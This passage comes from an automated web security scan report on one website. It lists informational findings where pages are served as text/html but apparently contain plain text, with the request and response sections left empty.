Path:	/tag/ssl+certificates

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

11.28. http://www.resellerbase.com/tag/survey previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/survey

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

11.29. http://www.resellerbase.com/tag/uptime+monitoring previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/uptime+monitoring

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

11.30. http://www.resellerbase.com/tag/web+cam+chat previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/web+cam+chat

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

11.31. http://www.resellerbase.com/tag/web+statistics previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/web+statistics

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

11.32. http://www.resellerbase.com/tag/webhosting previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/webhosting

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

11.33. http://www.resellerbase.com/tag/website+monitoring previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/website+monitoring

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

11.34. http://www.resellerbase.com/web-service/more2.html previous

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/more2.html

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

Report generated by XSS.CX at Thu Nov 18 07:14:17 EST 2010.